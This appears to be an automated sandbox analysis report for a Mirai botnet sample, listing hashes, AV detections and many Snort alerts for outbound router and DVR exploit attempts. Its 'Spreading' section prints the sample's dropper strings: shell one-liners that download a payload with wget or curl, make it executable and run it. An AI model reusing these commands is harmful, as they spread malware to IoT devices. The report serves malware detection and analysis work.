Analysis Report KnAY2OIPI3

Overview

General Information

Sample Name: KnAY2OIPI3
Analysis ID: 402062
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: KnAY2OIPI3 Avira: detected
Antivirus detection for dropped file
Source: /usr/networks Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: KnAY2OIPI3 Virustotal: Detection: 67% Perma Link
Source: KnAY2OIPI3 Metadefender: Detection: 51% Perma Link
Source: KnAY2OIPI3 ReversingLabs: Detection: 68%

Spreading:

barindex
Found strings indicative of a multi-platform dropper
Source: KnAY2OIPI3 String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: KnAY2OIPI3 String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: KnAY2OIPI3 String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/KnAY2OIPI3 (PID: 4619) Opens: /proc/net/route Jump to behavior
Source: /tmp/KnAY2OIPI3 (PID: 4619) Opens: /proc/net/route Jump to behavior

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.208.214.175: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.56.89.143: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.18.148.170: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 124.156.101.207: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.229.152.239: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.223.72.66: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.98.239.62: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.96.182.253: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.130.196.195: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.230.159.253: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.228.94.133: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.167.218.252: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:54872 -> 136.0.253.113:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:54872 -> 136.0.253.113:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 41.182.36.137: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 136.244.87.126: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.19.63.66: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.149.76.115: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.255.14.222: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 91.185.16.166: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.134.224.32: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.57.181: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 66.42.66.94: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.22.77.17: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.202.31.56: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.172.240.32: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.134.247.160: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.2.161.23: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.16.40.146: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 109.196.48.13: -> 192.168.2.20:
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 173.222.98.151:80 -> 192.168.2.20:33522
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33522 -> 173.222.98.151:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:51310 -> 67.161.57.86:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:51310 -> 67.161.57.86:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56338 -> 72.43.231.74:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56338 -> 72.43.231.74:8080
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.6.114.154: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.180.130.70: -> 192.168.2.20:
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44236
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44236
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.200.129.165: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 213.163.127.204:11211 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 32.112.192.2: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.78.190.57: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.138.106:3132 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 118.98.102.31: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.103.89.237: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 125.25.5.1: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 47.104.191.32:4748 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.223.65.103: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 195.10.10.214: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 81.229.230.103:33561 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44522
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44522
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 203.115.91.51:34352 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.45.90:11211 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44526
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44526
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.196.202.142: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.175.137: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 156.240.25.185: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.169.194.165: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.98.24.191: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.96.136.98: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.57.220:57814 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 101.0.32.248:58269 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44564
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44564
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.114.166.93: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 5.147.113.227: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 71.77.44.197: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 119.254.195.60: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 180.188.236.155:12560 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44566
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44566
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44832
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44832
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.206.52.202: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.255.9.34: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.181.58.157: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.11.163.25: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.65.49:1434 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.205.41.77: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 197.13.3.22: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 4.71.193.226: -> 192.168.2.20:
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44866
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44866
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 133.33.148.13: -> 192.168.2.20:
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44870
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44870
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 185.117.110.244: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.228.189.171: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.210.170.210: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.59.19.246: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44876
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44876
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.212.159.206: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.103.236.202: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.193.206.112: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 83.135.84.13: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 172.249.67.48: -> 192.168.2.20:
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:45144
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:45144
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.208.68.123: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.3.67.248: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:37406 -> 125.163.72.204:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:37406 -> 125.163.72.204:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.229.150:18307 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.150.138:1434 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.238.31.196: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 168.95.98.254: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:41102 -> 134.84.133.102:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:40300 -> 114.158.233.160:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.138.177:55447 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.194.160.46:1434 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36272 -> 149.47.68.142:80
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 38.132.107.12: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.9.106.56: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57540 -> 23.219.72.193:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57540 -> 23.219.72.193:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.219.72.193:80 -> 192.168.2.20:57540
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.73.4.65: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 213.160.135.10: -> 192.168.2.20:
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:42586 -> 89.39.161.69:8080
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.206.125.140: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.26.24.9: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:35596 -> 66.221.91.189:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:38046 -> 172.82.182.74:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:35596 -> 66.221.91.189:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:38046 -> 172.82.182.74:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:41548 -> 219.100.243.45:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:41548 -> 219.100.243.45:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51012 -> 114.67.85.20:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51012 -> 114.67.85.20:80
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 145.145.4.151: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35956 -> 155.230.225.129:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 185.8.165.103: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.86.28.7: -> 192.168.2.20:
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.78.24.125:80 -> 192.168.2.20:42680
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:42680 -> 23.78.24.125:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.39.50.75: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:43638 -> 182.254.240.127:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:43638 -> 182.254.240.127:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 92.122.164.134:80 -> 192.168.2.20:37352
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.206.158.170: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 158.165.7.160: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:50960 -> 75.2.41.208:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:50960 -> 75.2.41.208:80
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.39.76.209: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.104.29.43: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 211.196.102.221: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.214.81.66: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:54438 -> 209.182.209.236:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:54438 -> 209.182.209.236:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:35018 -> 168.226.35.54:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:35018 -> 168.226.35.54:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.251.0.109: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.102.43:19221 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 121.43.39.69:2157 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 118.37.10.100:20358 -> 192.168.2.20:18022
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 213.91.166.30: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45446 -> 27.124.38.242:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45446 -> 27.124.38.242:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:42960 -> 171.247.8.159:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:57376 -> 216.164.6.45:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:57376 -> 216.164.6.45:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36678 -> 164.132.44.102:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:37580 -> 65.110.89.33:80
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.32.56.177: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:51776 -> 38.35.98.151:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.0.80.86: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 168.95.154.5: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56148 -> 79.134.64.48:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56148 -> 79.134.64.48:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:56922 -> 52.58.36.52:80
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.231.30: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.218.212.205: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:48564 -> 104.17.41.126:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:48564 -> 104.17.41.126:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.86.69.17: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.213.241.180: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:54194 -> 157.131.125.97:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:54194 -> 157.131.125.97:80
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 62.4.89.110: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.108.97.228: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.206.231.226: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:37050 -> 186.95.149.6:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:37050 -> 186.95.149.6:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 125.206.16.131: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.214.81.98: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 130.34.242.248: -> 192.168.2.20:
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:51678 -> 31.10.38.98:8080
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35232 -> 199.204.251.131:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:37352 -> 92.122.164.134:80
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 52.0.157.125 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 9.100.19.116 ports 1,2,3,5,7,37215
